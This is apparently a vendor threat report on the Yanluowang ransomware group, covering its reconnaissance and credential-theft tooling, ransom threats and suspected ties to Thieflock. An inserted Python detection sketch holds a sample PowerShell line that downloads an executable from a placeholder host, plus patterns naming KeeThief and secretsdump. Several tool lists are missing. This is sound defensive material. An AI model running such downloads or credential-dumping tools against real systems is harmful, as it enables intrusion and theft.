United States organizations within the financial sector are currently being attacked by a recently discovered ransomware operation named Yanluowang. The operation is experienced with ransomware-as-a-service (RaaS) and could be linked to the veteran RaaS groups Fivehands and Thieflock. Although the group is primarily focused on attacking organizations within the financial sector, it has also targeted companies in manufacturing, IT services, consultancy, and engineering. Let’s take a look at Yanluowang’s tactics and techniques, and at how they may be connected to Fivehands and Thieflock.
Important Note: At present, both the ransomware gang and its ransomware are named Yanluowang. The name Yanluowang is therefore used for both throughout this report.
In October 2021, Symantec’s Threat Hunter Team, a division of Broadcom Software, discovered that Yanluowang ransomware was actively being used by a threat actor who had been seen attacking U.S. corporations since at least August 2021. What was interesting about the attack was that many of the tools, tactics, and procedures (TTPs) used had previously been used by the ransomware threat actor Thieflock. Most analysts assumed that the threat actor using Yanluowang must be an affiliate of Thieflock who had shifted allegiances. Although Yanluowang attempted to attack a large organization in October 2021 by deploying ransomware, the attempt was not successful because the ransomware was somewhat underdeveloped.
According to Symantec, its Threat Hunter Team initially discovered the use of AdFind, a legitimate command-line Active Directory query tool, on the undisclosed target’s network. Ransomware attackers often use AdFind as a reconnaissance tool, since it gives them the Active Directory information they need for lateral movement. Days after the suspicious use of AdFind was discovered, the attackers attempted to deploy Yanluowang ransomware.
Through research, Symantec observed the following precursor tools carrying out the below actions:
After Yanluowang is deployed, it carries out the following actions:
After further research, Symantec found that, most of the time, the threat actors behind Yanluowang used PowerShell to download tools to compromised systems, with BazarLoader assisting in reconnaissance. They then enable RDP through the registry to gain remote access. ConnectWise (a remote access tool) is deployed after the attackers gain initial access.
AdFind and SoftPerfect Network Scanner (netscan.exe, a tool used for discovery of hostnames and network services) are used to perform lateral movement and identify systems of interest. The next phase of Yanluowang’s attack is credential theft using credential-stealing tools. These tools include:
A number of open-source tools are also used, such as KeeThief, a PowerShell script that copies the master key from KeePass. Yanluowang also uses customized versions of open-source credential dumping tools (secretdump.exe), which also aid in dumping credentials from the registry. Cobalt Strike Beacon was also seen deployed against at least one targeted organization.
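The precursor activity described above (AdFind reconnaissance, PowerShell tool downloads, RDP enabled through the registry, netscan.exe discovery, KeeThief and secretsdump-style credential dumping) is exactly the kind of telemetry a SOC can correlate before the ransomware itself is deployed. The following detection sketch is an added example and is not code from the report or from Symantec; the event records are constructed samples shaped like Sysmon process-creation and registry-set events, and the rule patterns (including the fDenyTSConnections registry value as the mechanism for "RDP via registry") are my assumptions, not indicators from the page.

```python
import re

# Constructed sample telemetry (not real logs), shaped like Sysmon EventID 1
# (process create) and EventID 13 (registry value set) records.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Temp\adfind.exe",
     "cmdline": "adfind.exe -f objectcategory=computer -csv name operatingSystem"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -c Invoke-WebRequest http://placeholder.invalid/t.exe -OutFile C:\Temp\t.exe"},
    {"id": 13, "target": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},  # 0 = RDP connections allowed
    {"id": 1, "image": r"C:\Temp\netscan.exe", "cmdline": "netscan.exe /range:10.0.0.1-10.0.0.254"},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# (rule name, attack phase from the report, event id, field to inspect, regex)
RULES = [
    ("adfind_ad_recon", "reconnaissance", 1, "cmdline", r"(?i)\badfind(\.exe)?\b"),
    ("netscan_discovery", "lateral movement", 1, "image", r"(?i)\\netscan\.exe$"),
    ("powershell_download", "tool staging", 1, "cmdline",
     r"(?i)powershell.*(downloadstring|downloadfile|invoke-webrequest|\biwr\b)"),
    ("keethief_keepass", "credential theft", 1, "cmdline", r"(?i)keethief|get-keepassdatabasekey"),
    ("secretsdump", "credential theft", 1, "image", r"(?i)\\secrets?dump(\.exe)?$"),
    ("rdp_enabled_registry", "remote access", 13, "target",
     r"(?i)\\Terminal Server\\fDenyTSConnections$"),
]

def match_event(event):
    """Return (rule name, phase) for every rule the event matches."""
    hits = []
    for name, phase, eid, field, pattern in RULES:
        if event.get("id") != eid or not re.search(pattern, event.get(field, "")):
            continue
        # The registry rule only fires when the value is written as 0 (RDP enabled).
        if name == "rdp_enabled_registry" and not re.search(r"0x0+\)", event.get("details", "")):
            continue
        hits.append((name, phase))
    return hits

def analyse(events):
    """Run every rule over one host's events; two or more distinct phases suggests
    the precursor chain the report describes and is worth escalating."""
    findings = [(event, hit) for event in events for hit in match_event(event)]
    phases = sorted({phase for _, (_, phase) in findings})
    return {"findings": findings, "phases": phases, "escalate": len(phases) >= 2}

if __name__ == "__main__":
    for event, (name, phase) in analyse(SAMPLE_EVENTS)["findings"]:
        print(f"{name:22} {phase:18} {event.get('cmdline') or event.get('target')}")
```

Because the report notes that days passed between the AdFind activity and the ransomware deployment attempt, correlating several phases on one host gives responders a window to act before encryption.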
Image 1: Yanluowang Ransom Note
Additionally, the threat actors behind Yanluowang leave behind a ransom note that warns victims not to contact law enforcement or ransomware negotiation firms. If they do, the attackers will conduct a distributed denial of service (DDoS) attack and make “calls to employees and business partners”. They’ve also threatened to repeat the attack in a matter of weeks and delete their victim’s data.
Many speculate that Yanluowang could be connected to Thieflock and Fivehands. After researchers looked into the tactics and techniques that Yanluowang uses, they noticed a possible connection to older attacks by Thieflock, a ransomware operation developed by the Fivehands ransomware group. Fivehands is a ransomware variant that has been used to steal information, obfuscate files, perform network discovery, and obtain credential access. As of April 2021, Fivehands was used by the threat actor UNC2447 to exploit a SonicWall software flaw before the flaw was fixed.
While Fivehands is relatively new to the ransomware scene, researchers are linking it to Yanluowang. When UNC2447 exploited SonicWall, they showed advanced capabilities to evade detection and minimize post-intrusion forensics, as Yanluowang does. Yanluowang also relies on several tactics and techniques found in Fivehands ransomware, such as using GrabFF, SoftPerfect Network Scanner, and the S3 Browser and Cent Browser to upload and download data.
Researchers and analysts are curious about the connection between Yanluowang, Thieflock, and Fivehands, but right now there is little evidence confirming one. Researchers still hold firmly to the belief that the cyber criminals behind Yanluowang may simply count a former Thieflock affiliate among their ranks.
Because law enforcement is cracking down on ransomware operations, many new variants have surfaced over the year. Many new strains have been used in double-extortion attacks, where attackers encrypt stolen data and threaten to leak it if their demands aren’t honored. In October alone, 314 organizations worldwide became victims of double-extortion attacks, with the worst offenders being Conti, LockBit, Hive, and BlackMatter.
Yanluowang’s goal is to locate and steal as much information (passwords, usernames, etc.) as possible to use against its victims. Its ransom note indicates the threat of double extortion if victims don’t comply with its demands. If organizations are going to protect themselves from threat actors like Yanluowang, who will stop at nothing for financial gain, it’s important to become familiar with their tactics and techniques.
Research from the U.S. Financial Crimes Enforcement Network (FinCEN) found that payments linked to ransomware attacks amounted to $590 million in 2021. This exceeds the total for 2020 and is continuing to rise. Because the cyber landscape is always changing, it’s imperative to be aware of new cyber attack strategies and techniques. Avertium is here to keep you informed and to keep your organization safe. We recommend the following for the best protection against ransomware attacks:
Recommendations from Avertium and our partner, Advanced Intelligence:
If your organization is impacted by a ransomware attack, the FBI and CISA recommend the following:
DDoS - disruption of internet-based services that can make any internet-connected machine unable to perform its intended purpose.
PowerShell - used for automating the management of systems. Can also be used to build, test, and deploy solutions, often in CI/CD environments.
Ransomware - malicious software that infects a device and stops users from accessing data and files until a ransom is paid.
RDP - technical standard for using a desktop computer remotely.
This document and its contents do not constitute, and are not a substitute for, legal advice. The outcome of a Security Risk Assessment should be used to ensure that diligent measures are taken to lower the risk of potential weaknesses being exploited to compromise data.
Although the Services and this report may provide data that Client can use in its compliance efforts, Client (not Avertium) is ultimately responsible for assessing and meeting Client's own compliance responsibilities. This report does not constitute a guarantee or assurance of the Client's compliance with any law, regulation, or standard.